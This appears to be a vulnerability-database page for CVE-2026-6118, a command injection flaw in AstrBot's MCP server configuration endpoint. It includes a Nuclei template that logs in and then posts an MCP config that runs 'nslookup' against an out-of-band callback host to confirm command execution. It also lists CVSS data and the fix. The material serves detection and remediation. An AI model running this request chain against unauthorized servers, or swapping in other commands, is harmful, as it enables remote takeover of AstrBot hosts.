/Vulnerability Library

AstrBot <= 4.22.1 - Command Injection

CVE-2026-6118
Verified

Description

AstrBot versions up to and including 4.22.1 contain a command injection vulnerability in the MCP server configuration endpoint. The /api/tools/mcp/add endpoint accepts arbitrary command and args fields that are passed directly to subprocess execution during the connection test, without any validation or allowlist enforcement. An attacker with dashboard access can execute arbitrary system commands with AstrBot process privileges.

Severity

High

CVSS Score

8.8

Exploit Probability

4%

Affected Product

AstrBot

Published Date

April 12, 2026

Template Author

jyoti369

CVE-2026-6118.yaml
id: CVE-2026-6118

info:
  name: AstrBot <= 4.22.1 - Command Injection
  author: jyoti369
  severity: high
  description: |
    AstrBot versions up to and including 4.22.1 contain a command injection vulnerability in the MCP server configuration endpoint. The /api/tools/mcp/add endpoint accepts arbitrary command and args fields that are passed directly to subprocess execution during the connection test, without any validation or allowlist enforcement. An attacker with dashboard access can execute arbitrary system commands with AstrBot process privileges.
  impact: |
    Authenticated attackers can execute arbitrary system commands, leading to full server compromise, data exfiltration, and lateral movement.
  remediation: |
    Upgrade AstrBot to version 4.22.2 or later which introduces command allowlisting and validation. Change default dashboard credentials immediately.
  reference:
    - https://github.com/AstrBotDevs/AstrBot/issues/7169
    - https://nvd.nist.gov/vuln/detail/CVE-2026-6118
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-6118
    epss-score: 0.04416
    epss-percentile: 0.89035
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    vendor: AstrBotDevs
    product: AstrBot
    shodan-query: title:"AstrBot"
  tags: cve,cve2026,astrbot,rce,oast,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{md5(password)}}"}

    matchers:
      - type: word
        part: body
        words:
          - '"token"'
        internal: true

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - '"token"\s*:\s*"([^"]+)"'
        internal: true

  - raw:
      - |
        POST /api/tools/mcp/add HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Bearer {{token}}

        {"name":"{{randstr}}","command":"nslookup","args":["{{interactsh-url}}"],"active":false}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "status", "MCP connection test failed")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206b4503428578481f0a0cc1a9a86a4d51a4c9a289de89166f27e62aa6cbd3f37502207d37e4e0577cfcf1616c87d97e5fbb60ad332b01b1f6c2c8fe10884940815343:922c64590222798bb761d5b6d8e72950
8.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-6118
CWE ID:
cwe-94

References

https://github.com/AstrBotDevs/AstrBot/issues/7169https://nvd.nist.gov/vuln/detail/CVE-2026-6118

Remediation Steps

Upgrade AstrBot to version 4.22.2 or later which introduces command allowlisting and validation. Change default dashboard credentials immediately.